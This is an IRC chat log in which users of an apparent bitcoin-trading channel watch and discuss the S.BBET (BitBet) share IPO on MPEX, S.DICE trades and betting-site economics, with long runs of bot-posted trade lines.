noscript, ofc. Jan 11 00:46:22 the fuck Jan 11 00:46:23 Anduck pm me the addy if ya want i can double check Jan 11 00:46:26 I just made like 35000 trilema credits Jan 11 00:46:29 unless you're an avid readed of teh site, that is. Jan 11 00:46:39 Bugpowder omg hax ?! Jan 11 00:46:46 naw Jan 11 00:46:49 over 14.17 Jan 11 00:46:58 +2.54 BTC Jan 11 00:47:00 lol. wd. Jan 11 00:47:02 #WINNING Jan 11 00:47:28 email me the deposit address. I want credits. Jan 11 00:47:31 I'll use Google as a proxy Jan 11 00:48:06 ;;ticker Jan 11 00:48:07 BTCUSD ticker | Best bid: 14.02859, Best ask: 14.12999, Bid-ask spread: 0.10140, Last trade: 14.12999, 24 hour volume: 52066.63099603, 24 hour low: 13.75001, 24 hour high: 14.32000, 24 hour vwap: 14.03725 Jan 11 00:48:19 ..till mircea starts to ask google for payment Jan 11 00:48:20 ;;calc 1/14.03 Jan 11 00:48:21 0.0712758374911 Jan 11 00:48:57 [MPEX] [S.DICE] 426 @ 0.00469697 = 2.0009 BTC [+] Jan 11 00:48:59 [MPEX] [S.DICE] 2400 @ 0.00469313 = 11.2635 BTC [-] Jan 11 00:52:49 i think this is called making bitcoinz hand over fist. Jan 11 00:53:08 "blocks" : 166185, nope Jan 11 00:53:48 hm ? Jan 11 00:54:46 hmm... what is this 7.5 BTC outlay? Jan 11 00:55:28 each bet receives .1 btc from the house. Jan 11 00:55:53 [MPEX] [S.DICE] 1300 @ 0.00456388 = 5.933 BTC [-] Jan 11 00:55:56 oh Jan 11 00:56:41 That means bets under a 10 BTC total are a loss Jan 11 00:56:56 well no, cause house can't lose BOTH ends of a bet. Jan 11 00:57:22 at most house loses .9 btc per bet if the odds are split 9:1 and the unlikely side prevails. Jan 11 00:57:55 but in general cost per bet should be < .5 Jan 11 00:58:17 we;ll have better data after some months obviously. Jan 11 01:00:25 [MPEX] [S.DICE] 1716 @ 0.00464427 = 7.9696 BTC [+] Jan 11 01:00:26 [MPEX] [S.DICE] 484 @ 0.00470668 = 2.278 BTC [+] Jan 11 01:00:56 oh, the .1 is bet on one side Jan 11 01:01:31 no, the .1 is total. Jan 11 01:01:37 split accordsing to some evaluation of odds. Jan 11 01:01:42 the proposer gets the smaller side. Jan 11 01:02:04 and my .9 btc above should have been 0.09 Jan 11 01:02:08 I am freaking stoked for the variable decay Jan 11 01:02:14 and cost 0.05 Jan 11 01:02:25 Bugpowder :D Jan 11 01:03:10 oh, I see Jan 11 01:03:11 Going to market make for NFL bets next round. Hopefully the shallower decay curve will encourage more voting due to better EV throughout the betting period Jan 11 01:03:51 The cool thing about variable delay is that the decay basically functions as a vig for the early bettors (like the proposer) Jan 11 01:04:18 kinda the idea of decay in the first place. Jan 11 01:04:19 What is the optimal decay rate for a single event at a scheduled time in the future Jan 11 01:04:24 :D Jan 11 01:04:29 you should write a bitbet white paper. Jan 11 01:04:41 I will for 20 BTC Jan 11 01:04:48 hm Jan 11 01:04:55 actually no Jan 11 01:04:57 i was just about typing i'll send you a modest btc sponsorship Jan 11 01:05:11 but 20 btc ain't modest! it's like over 9 thousand hashes! Jan 11 01:05:13 WEll Jan 11 01:05:17 I dunno Jan 11 01:05:26 lol Jan 11 01:05:32 starting tomorrow I am going to be spending a lot of time on a startup idea Jan 11 01:05:40 i doubt anyone cnat raed well enough to actually copy your shit. Jan 11 01:05:47 so a whitepaper on bitbet might not be in the cards Jan 11 01:06:01 a well. Jan 11 01:06:13 BUt there are some simple point Jan 11 01:06:15 points Jan 11 01:06:21 [MPEX] [S.DICE] 683 @ 0.00456388 = 3.1171 BTC [-] Jan 11 01:06:37 It is beneficial for the proposer to place as much capital as possible on the bet Jan 11 01:06:45 to encourage betting Jan 11 01:06:47 not really. Jan 11 01:06:54 if he places 21 mn capital he just killed betting. Jan 11 01:07:02 heh Jan 11 01:07:06 but you see my point. Jan 11 01:07:09 there's an optimum. Jan 11 01:07:24 with any time decay, you get free odds Jan 11 01:07:27 err Jan 11 01:07:29 free vig Jan 11 01:07:41 yeah it was a bet i got the btc parts from =D Jan 11 01:08:04 and you want to minimize the amount the odds change when other people bet, to encourage them from making bigger bets Jan 11 01:08:17 bigger bets = bigger wins and bigger profits for bitbet Jan 11 01:08:19 http://jcph.am/2013/01/10/mining-interlude/ Jan 11 01:08:29 this in principle is true Jan 11 01:11:00 Bugpowder re the vig thing : it's not that simple. on one hand it will have to cover btc free rate Jan 11 01:11:09 on the other, if it's too large people wil ljust skip the bet. Jan 11 01:11:11 so it's a balancing act. Jan 11 01:11:56 exactly Jan 11 01:12:08 Denver Broncos over Baltimore Ravens really is 1:3 ?~ Jan 11 01:12:16 [MPEX] [S.DICE] 170 @ 0.00456388 = 0.7759 BTC [-] Jan 11 01:12:18 [MPEX] [S.DICE] 996 @ 0.00456311 = 4.5449 BTC [-] Jan 11 01:13:28 [MPEX] [S.DICE] 1816 @ 0.00470668 = 8.5473 BTC [+] Jan 11 01:13:29 [MPEX] [S.DICE] 634 @ 0.00471508 = 2.9894 BTC [+] Jan 11 01:15:08 jcpham: how much does your power cost? Jan 11 01:16:46 [MPEX] [S.DICE] 400 @ 0.00471508 = 1.886 BTC [+] Jan 11 01:16:48 Mine costs 0.075 CAD per kwh Jan 11 01:17:06 nice Jan 11 01:18:25 I don't mine however =/ Jan 11 01:20:55 jcpham: trap is the new dubstep Jan 11 01:21:01 [MPEX] [S.DICE] 1200 @ 0.00457039 = 5.4845 BTC [-] Jan 11 01:21:05 I predict it will last about as long Jan 11 01:21:13 ie, 13 seconds Jan 11 01:24:33 dj dub's acid test of genre longevity: if I can mix it flawlessly without the use of ears, watching the waveform in serato only, its doomed Jan 11 01:28:00 [MPEX] [S.DICE] 1006 @ 0.00457039 = 4.5978 BTC [-] Jan 11 01:28:02 [MPEX] [S.DICE] 1044 @ 0.00456311 = 4.7639 BTC [-] Jan 11 01:29:52 "* I have taken the unusual step in this case of not linking to this racist lunatic's foul-mouthed outpourings which I've had the misfortune of stumbling across previously." Jan 11 01:29:53 ahaha! Jan 11 01:29:56 people love trilema. Jan 11 01:34:12 $217.28 monthly minus power. Facepalm. Jan 11 01:34:14 lol poor jcpham Jan 11 01:35:02 powering my GPUs costs more than that Jan 11 01:35:18 for like 1.5GH Jan 11 01:37:29 i was told at work today airbnb is on the up and up Jan 11 01:37:50 your old friend mircea_popescu Jan 11 01:38:01 yea, sure. Jan 11 01:38:40 they being my bosses, said it was on some top 10 list Jan 11 01:38:52 along with dropbox Jan 11 01:38:54 lol Jan 11 01:39:28 top 10 ideas with highest buoyancy as teh manager say Jan 11 01:40:23 [MPEX] [S.DICE] 460 @ 0.00456311 = 2.099 BTC [-] Jan 11 01:40:24 [MPEX] [S.DICE] 272 @ 0.00456208 = 1.2409 BTC [-] Jan 11 01:41:31 o i see Jan 11 01:41:38 well then it must indeed be a real business. Jan 11 01:41:46 liek, you know, dubstep Jan 11 01:42:49 WOMP WOMP WOMP Jan 11 01:43:06 ^^^ what dubstep sounds like Jan 11 01:43:55 [MPEX] [S.MPOE] 16100 @ 0.00063493 = 10.2224 BTC [+] Jan 11 01:44:17 Hmm... 1200 BTC profit in a year estimate? Decent. Jan 11 01:44:41 I grossly rounded the number but eh Jan 11 01:44:56 More like 1300 Jan 11 01:45:00 i woulsdn't put much weight on 5 days extrapolarted to 1 year Jan 11 01:45:09 yeah, me neither. Jan 11 01:45:26 I'd expect it to be lower. Maybe 300-600. Jan 11 01:45:39 or why not 300-600k Jan 11 01:46:18 Hmm. Because I don't see that much demand for event betting. Jan 11 01:46:26 o rly. Jan 11 01:46:35 well, in simple terms : it has half the fee of s.dice and about twice the fun Jan 11 01:46:52 betting is huge business, 500k btc is nothing. Jan 11 01:47:03 so... yeah. that figure's mostly meaningless. Jan 11 01:47:22 Well, gamblers are often impatient... hence why they gamble instead of buying a S.DICE share... they want to win right away, get more. Jan 11 01:47:31 sure. Jan 11 01:47:44 Well, for sport events, there is a lot of demand. Jan 11 01:47:59 I just don't see much demand for that elsewhere either in bitcoin, at least for now. Jan 11 01:47:59 betsofbitco.in failed so far Jan 11 01:48:09 tzui management problems. Jan 11 01:49:42 are you the lead developer of bitbet? Jan 11 01:49:57 no. Jan 11 01:50:23 I'm sure mircea/kako could even get sections with default bets for every match for certain sport events and other enat features rolled out. Jan 11 01:50:30 that is why bitbet has such a great design Jan 11 01:50:32 http://bit.ly/UOPcS4 lol Jan 11 01:50:38 ZOMG GLOWING ASTEROID Jan 11 01:50:44 Namworld possibly but i'd rather it be done by people. Jan 11 01:50:47 same model that pushed mpex. Jan 11 01:51:08 midnightmagic coming right at ya ? Jan 11 01:52:07 bitbet needs an entertaiment category Jan 11 01:52:36 Hmm... 8 minutes before IPO Jan 11 01:53:12 tzui likely ya Jan 11 01:54:24 either mircea is manipulating or there are some big time idiots bidding Jan 11 01:55:05 can't say i haven't heard that before. Jan 11 01:55:15 entertainment added too. Jan 11 01:55:54 the 1.8 million is 500 BTC =/ Jan 11 01:55:54 lol Jan 11 01:56:03 S.DICE IPO Jan 11 01:56:23 4 minutes? Jan 11 01:56:29 yeah Jan 11 01:57:09 im kind of excited, see if this fucks up lol Jan 11 01:57:14 lol Jan 11 01:57:38 some buys don't make any sense there are huge gaps Jan 11 01:57:57 *makes extra backup* Jan 11 01:58:41 http://live.coinbr.com/?mpsic=S.BBET Jan 11 01:58:45 how 'live' is this? Jan 11 01:58:56 is it live live? Jan 11 01:59:30 it should be Jan 11 01:59:32 [MPEX] [S.DICE] 1100 @ 0.00456955 = 5.0265 BTC [+] Jan 11 01:59:33 [MPEX] [S.DICE] 1528 @ 0.00456208 = 6.9709 BTC [-] Jan 11 01:59:35 [MPEX] [S.DICE] 54 @ 0.00456198 = 0.2463 BTC [-] Jan 11 01:59:44 not animated. you have to refresh Jan 11 01:59:49 stop teasin assbot Jan 11 01:59:56 lmao Jan 11 02:00:10 [MPEX] [S.BBET] 10000 @ 0.00055 = 5.5 BTC Jan 11 02:00:11 [MPEX] [S.BBET] 10000 @ 0.00055 = 5.5 BTC Jan 11 02:00:12 [MPEX] [S.BBET] 10000 @ 0.00055 = 5.5 BTC Jan 11 02:00:13 [MPEX] [S.BBET] 10000 @ 0.00055 = 5.5 BTC Jan 11 02:00:14 [MPEX] [S.BBET] 10000 @ 0.00055 = 5.5 BTC Jan 11 02:00:16 [MPEX] [S.BBET] 4500 @ 0.00055 = 2.475 BTC Jan 11 02:00:17 [MPEX] [S.BBET] 5500 @ 0.0005 = 2.75 BTC [-] Jan 11 02:00:18 [MPEX] [S.BBET] 10000 @ 0.0005 = 5 BTC [-] Jan 11 02:00:19 [MPEX] [S.BBET] 10000 @ 0.0005 = 5 BTC [-] Jan 11 02:00:20 [MPEX] [S.BBET] 10000 @ 0.0005 = 5 BTC [-] Jan 11 02:00:21 [MPEX] [S.BBET] 10000 @ 0.0005 = 5 BTC [-] Jan 11 02:00:21 [MPEX] [S.BBET] 10000 @ 0.0005 = 5 BTC [-] Jan 11 02:00:23 [MPEX] [S.BBET] 10000 @ 0.0005 = 5 BTC [-] Jan 11 02:00:24 [MPEX] [S.BBET] 10000 @ 0.0005 = 5 BTC [-] Jan 11 02:00:25 [MPEX] [S.BBET] 10000 @ 0.0005 = 5 BTC [-] Jan 11 02:00:26 [MPEX] [S.BBET] 4500 @ 0.0005 = 2.25 BTC [-] Jan 11 02:00:27 [MPEX] [S.BBET] 5500 @ 0.0005 = 2.75 BTC [-] Jan 11 02:00:28 [MPEX] [S.BBET] 10000 @ 0.0005 = 5 BTC [-] Jan 11 02:00:29 [MPEX] [S.BBET] 10000 @ 0.0005 = 5 BTC [-] Jan 11 02:00:31 [MPEX] [S.BBET] 10000 @ 0.0005 = 5 BTC [-] Jan 11 02:00:32 lol Jan 11 02:00:32 [MPEX] [S.BBET] 10000 @ 0.0005 = 5 BTC [-] Jan 11 02:00:32 [MPEX] [S.BBET] 9500 @ 0.0005 = 4.75 BTC [-] Jan 11 02:00:33 [MPEX] [S.BBET] 500 @ 0.000337 = 0.1685 BTC [-] Jan 11 02:00:34 [MPEX] [S.BBET] 10000 @ 0.000337 = 3.37 BTC [-] Jan 11 02:00:35 o hello Jan 11 02:00:35 [MPEX] [S.BBET] 10000 @ 0.000337 = 3.37 BTC [-] Jan 11 02:00:36 [MPEX] [S.BBET] 10000 @ 0.000337 = 3.37 BTC [-] Jan 11 02:00:37 [MPEX] [S.BBET] 10000 @ 0.000337 = 3.37 BTC [-] Jan 11 02:00:38 [MPEX] [S.BBET] 10000 @ 0.000337 = 3.37 BTC [-] Jan 11 02:00:39 [MPEX] [S.BBET] 10000 @ 0.000337 = 3.37 BTC [-] Jan 11 02:00:40 [MPEX] [S.BBET] 10000 @ 0.000337 = 3.37 BTC [-] Jan 11 02:00:40 here they come! Jan 11 02:00:41 [MPEX] [S.BBET] 10000 @ 0.000337 = 3.37 BTC [-] Jan 11 02:00:42 [MPEX] [S.BBET] 10000 @ 0.000337 = 3.37 BTC [-] Jan 11 02:00:42 [MPEX] [S.BBET] 10000 @ 0.000337 = 3.37 BTC [-] Jan 11 02:00:43 [MPEX] [S.BBET] 10000 @ 0.000337 = 3.37 BTC [-] Jan 11 02:00:44 [MPEX] [S.BBET] 10000 @ 0.000337 = 3.37 BTC [-] Jan 11 02:00:45 [MPEX] [S.BBET] 10000 @ 0.000337 = 3.37 BTC [-] Jan 11 02:00:46 [MPEX] [S.BBET] 10000 @ 0.000337 = 3.37 BTC [-] Jan 11 02:00:47 soo it started? Jan 11 02:00:47 [MPEX] [S.BBET] 10000 @ 0.000337 = 3.37 BTC [-] Jan 11 02:00:48 [MPEX] [S.BBET] 10000 @ 0.000337 = 3.37 BTC [-] Jan 11 02:00:49 [MPEX] [S.BBET] 10000 @ 0.000337 = 3.37 BTC [-] Jan 11 02:00:50 [MPEX] [S.BBET] 10000 @ 0.000337 = 3.37 BTC [-] Jan 11 02:00:51 [MPEX] [S.BBET] 10000 @ 0.000337 = 3.37 BTC [-] Jan 11 02:00:51 [MPEX] [S.BBET] 10000 @ 0.000337 = 3.37 BTC [-] Jan 11 02:00:53 [MPEX] [S.BBET] 10000 @ 0.000337 = 3.37 BTC [-] Jan 11 02:00:53 [MPEX] [S.BBET] 10000 @ 0.000337 = 3.37 BTC [-] Jan 11 02:00:54 [MPEX] [S.BBET] 10000 @ 0.000337 = 3.37 BTC [-] Jan 11 02:00:55 [MPEX] [S.BBET] 10000 @ 0.000337 = 3.37 BTC [-] Jan 11 02:00:56 [MPEX] [S.BBET] 10000 @ 0.0004529 = 4.529 BTC [+] Jan 11 02:00:57 [MPEX] [S.BBET] 10000 @ 0.0004529 = 4.529 BTC [+] Jan 11 02:00:59 [MPEX] [S.BBET] 10000 @ 0.0004529 = 4.529 BTC [+] Jan 11 02:01:00 [MPEX] [S.BBET] 10000 @ 0.0004529 = 4.529 BTC [+] Jan 11 02:01:01 [MPEX] [S.BBET] 10000 @ 0.0004529 = 4.529 BTC [+] Jan 11 02:01:02 [MPEX] [S.BBET] 10000 @ 0.0004529 = 4.529 BTC [+] Jan 11 02:01:03 [MPEX] [S.BBET] 10000 @ 0.0004529 = 4.529 BTC [+] Jan 11 02:01:04 [MPEX] [S.BBET] 10000 @ 0.0004529 = 4.529 BTC [+] Jan 11 02:01:05 [MPEX] [S.BBET] 10000 @ 0.0004529 = 4.529 BTC [+] Jan 11 02:01:06 [MPEX] [S.BBET] 10000 @ 0.0004529 = 4.529 BTC [+] Jan 11 02:01:07 [MPEX] [S.BBET] 10000 @ 0.0004529 = 4.529 BTC [+] Jan 11 02:01:08 [MPEX] [S.BBET] 10000 @ 0.0004529 = 4.529 BTC [+] Jan 11 02:01:10 [MPEX] [S.BBET] 10000 @ 0.0004529 = 4.529 BTC [+] Jan 11 02:01:11 [MPEX] [S.BBET] 10000 @ 0.0004529 = 4.529 BTC [+] Jan 11 02:01:12 [MPEX] [S.BBET] 10000 @ 0.0004529 = 4.529 BTC [+] Jan 11 02:01:13 [MPEX] [S.BBET] 10000 @ 0.0004529 = 4.529 BTC [+] Jan 11 02:01:14 [MPEX] [S.BBET] 2347 @ 0.0035 = 8.2145 BTC [+] Jan 11 02:01:14 [MPEX] [S.BBET] 7653 @ 0.0004529 = 3.466 BTC [-] Jan 11 02:01:15 [MPEX] [S.BBET] 10000 @ 0.0004529 = 4.529 BTC [-] Jan 11 02:01:16 [MPEX] [S.BBET] 10000 @ 0.0004529 = 4.529 BTC [-] Jan 11 02:01:17 [MPEX] [S.BBET] 10000 @ 0.0004529 = 4.529 BTC [-] Jan 11 02:01:19 [MPEX] [S.BBET] 10000 @ 0.0004529 = 4.529 BTC [-] Jan 11 02:01:20 [MPEX] [S.BBET] 10000 @ 0.0004529 = 4.529 BTC [-] Jan 11 02:01:21 [MPEX] [S.BBET] 10000 @ 0.0004529 = 4.529 BTC [-] Jan 11 02:01:22 [MPEX] [S.BBET] 10000 @ 0.0004529 = 4.529 BTC [-] Jan 11 02:01:23 [MPEX] [S.BBET] 10000 @ 0.0004529 = 4.529 BTC [-] Jan 11 02:01:25 [MPEX] [S.BBET] 10000 @ 0.0004529 = 4.529 BTC [-] Jan 11 02:01:26 [MPEX] [S.BBET] 10000 @ 0.0004529 = 4.529 BTC [-] Jan 11 02:01:26 [MPEX] [S.BBET] 10000 @ 0.0004529 = 4.529 BTC [-] Jan 11 02:01:27 [MPEX] [S.BBET] 10000 @ 0.0004529 = 4.529 BTC [-] Jan 11 02:01:42 mmm Jan 11 02:02:09 i guess twitter crapped out ? Jan 11 02:02:10 shit didn't get any Jan 11 02:02:25 0.00034174 10`000 Jan 11 02:02:25 64`147 0.00033800 Jan 11 02:02:26 gap. Jan 11 02:02:45 ya well should have used asspost api Jan 11 02:03:20 heh i guess so. next on the list, that. Jan 11 02:03:27 and get kicked cause of flookding, lol Jan 11 02:03:29 well didn't get anything =/ Jan 11 02:03:43 Way overpriced bids coming in. Jan 11 02:03:47 [MPEX] [S.BBET] 4646 @ 0.00045931 = 2.134 BTC [+] Jan 11 02:03:49 [MPEX] [S.BBET] 10000 @ 0.00047309 = 4.7309 BTC [+] Jan 11 02:03:50 [MPEX] [S.BBET] 10000 @ 0.00048729 = 4.8729 BTC [+] Jan 11 02:03:51 [MPEX] [S.BBET] 10000 @ 0.00050191 = 5.0191 BTC [+] Jan 11 02:03:53 [MPEX] [S.BBET] 10000 @ 0.00051697 = 5.1697 BTC [+] Jan 11 02:03:53 o i got something Jan 11 02:03:54 [MPEX] [S.BBET] 10000 @ 0.00053248 = 5.3248 BTC [+] Jan 11 02:03:55 [MPEX] [S.BBET] 10000 @ 0.00054846 = 5.4846 BTC [+] Jan 11 02:03:56 [MPEX] [S.BBET] 10000 @ 0.00056492 = 5.6492 BTC [+] Jan 11 02:03:57 [MPEX] [S.BBET] 10000 @ 0.00058187 = 5.8187 BTC [+] Jan 11 02:03:58 [MPEX] [S.BBET] 10000 @ 0.00059933 = 5.9933 BTC [+] Jan 11 02:04:07 got i suc Jan 11 02:04:11 god i suck Jan 11 02:04:35 so Jan 11 02:04:42 btc-mining will never pay anything? Jan 11 02:04:48 [MPEX] [S.BBET] 10000 @ 0.00061731 = 6.1731 BTC [+] Jan 11 02:04:49 [MPEX] [S.BBET] 4000 @ 0.00063583 = 2.5433 BTC [+] Jan 11 02:05:03 If Amazingrando just disappeared, not likely =/ Jan 11 02:05:15 goddamnit man. Jan 11 02:05:58 Bugpowder what happened ? Jan 11 02:06:09 [MPEX] [S.BBET] 6000 @ 0.00063583 = 3.815 BTC [+] Jan 11 02:06:41 I need a password that is easier to type Jan 11 02:06:42 [MPEX] [S.BBET] 10000 @ 0.00065491 = 6.5491 BTC [+] Jan 11 02:07:03 [MPEX] [S.BBET] 10000 @ 0.00067456 = 6.7456 BTC [+] Jan 11 02:07:04 [MPEX] [S.BBET] 10000 @ 0.0006948 = 6.948 BTC [+] Jan 11 02:07:06 [MPEX] [S.BBET] 10000 @ 0.00071565 = 7.1565 BTC [+] Jan 11 02:07:07 [MPEX] [S.BBET] 10000 @ 0.00073712 = 7.3712 BTC [+] Jan 11 02:07:08 [MPEX] [S.BBET] 10000 @ 0.00075924 = 7.5924 BTC [+] Jan 11 02:07:12 [MPEX] [S.BBET] 10000 @ 0.00078202 = 7.8202 BTC [+] Jan 11 02:07:13 [MPEX] [S.BBET] 10000 @ 0.00080549 = 8.0549 BTC [+] Jan 11 02:07:14 [MPEX] [S.BBET] 10000 @ 0.00082966 = 8.2966 BTC [+] Jan 11 02:07:15 [MPEX] [S.BBET] 10000 @ 0.00085455 = 8.5455 BTC [+] Jan 11 02:07:16 [MPEX] [S.BBET] 10000 @ 0.00088019 = 8.8019 BTC [+] Jan 11 02:07:17 [MPEX] [S.BBET] 10000 @ 0.0009066 = 9.066 BTC [+] Jan 11 02:07:18 [MPEX] [S.BBET] 10000 @ 0.0009338 = 9.338 BTC [+] Jan 11 02:07:19 [MPEX] [S.BBET] 10000 @ 0.00096182 = 9.6182 BTC [+] Jan 11 02:07:21 ok, so ipo results : 1420000 shares sold, 671.58363400 total shit Jan 11 02:07:21 [MPEX] [S.BBET] 10000 @ 0.00099068 = 9.9068 BTC [+] Jan 11 02:07:22 [MPEX] [S.BBET] 10000 @ 0.00102041 = 10.2041 BTC [+] Jan 11 02:07:23 [MPEX] [S.BBET] 10000 @ 0.00105103 = 10.5103 BTC [+] Jan 11 02:07:24 [MPEX] [S.BBET] 10000 @ 0.00108257 = 10.8257 BTC [+] Jan 11 02:07:24 [MPEX] [S.BBET] 10000 @ 0.00111505 = 11.1505 BTC [+] Jan 11 02:07:25 i was just doing the sumups lol Jan 11 02:07:25 [MPEX] [S.BBET] 10000 @ 0.00114851 = 11.4851 BTC [+] Jan 11 02:07:26 [MPEX] [S.BBET] 10000 @ 0.00118297 = 11.8297 BTC [+] Jan 11 02:07:27 [MPEX] [S.BBET] 10000 @ 0.00121846 = 12.1846 BTC [+] Jan 11 02:07:28 [MPEX] [S.BBET] 10000 @ 0.00125502 = 12.5502 BTC [+] Jan 11 02:07:29 [MPEX] [S.BBET] 10000 @ 0.00129268 = 12.9268 BTC [+] Jan 11 02:07:30 [MPEX] [S.BBET] 10000 @ 0.00133147 = 13.3147 BTC [+] Jan 11 02:07:31 [MPEX] [S.BBET] 8587 @ 0.00137142 = 11.7764 BTC [+] Jan 11 02:07:32 [MPEX] [S.DICE] 1146 @ 0.00456198 = 5.228 BTC [-] Jan 11 02:07:33 [MPEX] [S.DICE] 1204 @ 0.00456034 = 5.4906 BTC [-] Jan 11 02:07:38 whoa Jan 11 02:07:41 [MPEX] [S.BBET] 1413 @ 0.00137142 = 1.9378 BTC [+] Jan 11 02:07:41 o sdice. lol. Jan 11 02:07:41 [MPEX] [S.BBET] 10000 @ 0.00141257 = 14.1257 BTC [+] Jan 11 02:07:42 [MPEX] [S.BBET] 10000 @ 0.00145495 = 14.5495 BTC [+] Jan 11 02:07:43 [MPEX] [S.BBET] 10000 @ 0.0014986 = 14.986 BTC [+] Jan 11 02:07:44 [MPEX] [S.BBET] 10000 @ 0.00154356 = 15.4356 BTC [+] Jan 11 02:07:44 lol Jan 11 02:07:45 its this still IPO? Jan 11 02:07:45 [MPEX] [S.BBET] 10000 @ 0.00158987 = 15.8987 BTC [+] Jan 11 02:07:46 mircea_popescu: think.. really people pay 10k USD for bitbet shars I AM TRULY AMAZED NOW Jan 11 02:07:46 [MPEX] [S.BBET] 10000 @ 0.00163757 = 16.3757 BTC [+] Jan 11 02:07:47 [MPEX] [S.BBET] 3014 @ 0.0016867 = 5.0837 BTC [+] Jan 11 02:07:57 Anduck you fail to grasp the power of mpex. Jan 11 02:08:02 [MPEX] [S.BBET] 6986 @ 0.0016867 = 11.7833 BTC [+] Jan 11 02:08:04 [MPEX] [S.BBET] 10000 @ 0.00173731 = 17.3731 BTC [+] Jan 11 02:08:05 [MPEX] [S.BBET] 10000 @ 0.00178943 = 17.8943 BTC [+] Jan 11 02:08:06 [MPEX] [S.BBET] 3696 @ 0.00184312 = 6.8122 BTC [+] Jan 11 02:08:11 Diablo-D3: i hope even you can see the NOSENSE AND STUPIDITY here, right???? right??? RIGHT??? Jan 11 02:08:34 well darn... some people... 0.0018, really? Jan 11 02:09:00 indeed.. Jan 11 02:09:02 really??? Jan 11 02:09:15 ok if everyone's done moving i can make the reports ? Jan 11 02:09:21 should've bought some for "cheap" and sell for 100x for stupid people Jan 11 02:09:35 lol Jan 11 02:09:38 [MPEX] [S.BBET] 8000 @ 0.00175 = 14 BTC [-] Jan 11 02:09:40 I'd wait a bit Jan 11 02:09:42 1`032.04540552 btc, o fuck me Jan 11 02:09:43 lol Jan 11 02:09:44 YES Jan 11 02:09:51 [MPEX] [S.BBET] 20000 @ 0.00175 = 35 BTC [-] Jan 11 02:09:59 ol I thought 0.0005 was expensive Jan 11 02:09:59 wait. what ?! Jan 11 02:10:01 o, profit taking Jan 11 02:10:10 tzui: it is, very Jan 11 02:10:11 dude this ipo will go down in history. Jan 11 02:10:15 this is fun Jan 11 02:10:15 oh... I actually catched 20k shares at 0.0003 Jan 11 02:10:27 for 7 BTC Jan 11 02:10:27 mircea_popescu: people are stupid. gratz, you and mpex proved it ! =) Jan 11 02:10:34 we should do this every day Jan 11 02:10:38 Namworld: sell them supafast Jan 11 02:10:41 woah assbot outspammed supa Jan 11 02:10:48 could flip those for 35 BTC easily Jan 11 02:10:53 do it man xD Jan 11 02:10:53 lol dub Jan 11 02:10:57 u can get even more, Namworld Jan 11 02:11:02 [MPEX] [S.BBET] 7000 @ 0.00175 = 12.25 BTC [-] Jan 11 02:11:32 [MPEX] [S.BBET] 1740 @ 0.00175 = 3.045 BTC [-] Jan 11 02:11:39 It's very educational what happened here Jan 11 02:11:43 mkay, fuck this, im doing the math. Jan 11 02:11:53 everyone tried to sandbag Jan 11 02:12:01 but when the market went up Jan 11 02:12:06 mob buy panic Jan 11 02:12:10 and.... Jan 11 02:12:12 1`096.34040552 btc total, 1800436 share count Jan 11 02:12:13 the mob might be right Jan 11 02:12:22 ;;calc 1096.34040552 / 1800436 Jan 11 02:12:22 0.000608930506566 Jan 11 02:12:28 but really.. that's just nonsense Jan 11 02:12:31 !ticker m s.bbet Jan 11 02:12:32 If the milk turns out to be sour, I aint the kinda pussy to drink it. Jan 11 02:12:42 a-ha! Jan 11 02:12:43 i cant even use my own shitz Jan 11 02:12:48 how many shares IPOd? Jan 11 02:12:53 haha Jan 11 02:13:01 what's this bbet thing Jan 11 02:13:01 i mean Jan 11 02:13:02 http://live.coinbr.com/?mpsic=S.BBET Jan 11 02:13:03 check it Jan 11 02:13:03 !ticker MPEX S.BBET Jan 11 02:13:05 dub 3mn Jan 11 02:13:05 If the milk turns out to be sour, I aint the kinda pussy to drink it. Jan 11 02:13:11 [MPEX] [S.BBET] 6853 @ 0.001 = 6.853 BTC [-] Jan 11 02:13:16 lyspooner http://mpex.co/?mpsic=S.BBET Jan 11 02:13:20 i can only say that people are truly stupid. Jan 11 02:13:22 1.77MM Jan 11 02:13:31 dude srsly, we get it. you were blown away by the market. Jan 11 02:13:33 sold thru Jan 11 02:13:42 doesn't on the face of it mean anything other than you werw wrong. Jan 11 02:13:55 16btc profit:) Jan 11 02:13:58 mircea_popescu: how much % of the bitbet you and kakobrekla still own after ipo? Jan 11 02:13:58 tldr me now Jan 11 02:14:00 *coinbr users are kindly asked to check their orders* Jan 11 02:14:07 lyspooner new parimutuel site. Jan 11 02:14:25 Anduck about 83% Jan 11 02:14:29 yeah Jan 11 02:14:33 82% something like that Jan 11 02:14:36 and u sold like 17% of them.. Jan 11 02:14:41 let's say u sold 20% of it Jan 11 02:14:48 each 10k block is like 0.1% Jan 11 02:14:49 Bugpowder was saying 17.7 Jan 11 02:14:51 and u got what, over 1000 btc? Jan 11 02:14:55 like 1k yeas Jan 11 02:15:03 i mean what the duck people Jan 11 02:15:03 177 blocks sold Jan 11 02:15:03 :D Jan 11 02:15:14 fuck I should have bid .6 Jan 11 02:15:17 14000 USD for selling _a little part_ of a just started betting site+? Jan 11 02:15:21 insteday of niping Jan 11 02:15:34 well Jan 11 02:15:39 !ticker Jan 11 02:15:40 Provide exchange and ticker. Jan 11 02:15:42 grr Jan 11 02:15:42 Anduck with new sites what matters is who's starting them. Jan 11 02:15:46 ;;ticker Jan 11 02:15:46 BTCUSD ticker | Best bid: 14.06200, Best ask: 14.13899, Bid-ask spread: 0.07699, Last trade: 14.13899, 24 hour volume: 51724.88009833, 24 hour low: 13.77000, 24 hour high: 14.32000, 24 hour vwap: 14.04826 Jan 11 02:15:46 VCs fund on the basis of the team Jan 11 02:15:53 oh hey, we finally hit 14? Jan 11 02:15:54 lol beat you to it. Jan 11 02:15:58 mircea_popescu EXACTLY Jan 11 02:16:03 mircea_popescu: people seem to overestimate the fees you get paid Jan 11 02:16:06 and the profit potential Jan 11 02:16:10 Diablo-D3: yes Jan 11 02:16:18 no, you seem to overestimate the normalisation. Jan 11 02:16:29 what do you think, "everyone's a people so nobody should get 1k" ? Jan 11 02:16:49 Diablo-D3 yea, somebody won like 10btc cause of it too. Jan 11 02:17:06 I think Ill sell when it hits 15 Jan 11 02:17:20 sell nao Jan 11 02:17:26 all the coins Jan 11 02:17:26 well i just mean that... Jan 11 02:17:32 nice business there, mp and kako Jan 11 02:17:32 xD Jan 11 02:17:37 hopefully. Jan 11 02:17:39 [MPEX] [S.BBET] 60000 @ 0.001 = 60 BTC [-] Jan 11 02:18:26 [MPEX] [S.BBET] 12962 @ 0.001 = 12.962 BTC [-] Jan 11 02:18:30 sell a just started, not proved to make any money service, and if it did, it would be <10btc/mo -sell a little part of it, for 20000 usd Jan 11 02:18:51 lol Jan 11 02:19:05 i am amazed if you make over 10 btc this month in fees. 